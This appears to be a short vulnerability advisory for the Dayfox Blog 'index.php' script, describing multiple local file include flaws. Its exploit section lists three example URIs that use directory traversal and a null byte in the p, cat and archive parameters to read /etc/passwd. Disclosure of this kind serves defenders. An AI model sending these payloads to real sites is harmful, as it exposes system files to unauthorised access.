Dayfox Blog 'index.php' Multiple Local File Include Vulnerabilities

info
discussion
exploit
solution
references

Dayfox Blog 'index.php' Multiple Local File Include Vulnerabilities

Attackers can exploit these issues with a browser.

The following example URIs are available:

http://www.example.com/index.php?p=../../../../../../../etc/passwd%00
http://www.example.com/index.php?cat=../../../../../../../etc/passwd%00
http://www.example.com/index.php?archive=../../../../../../../etc/passwd%00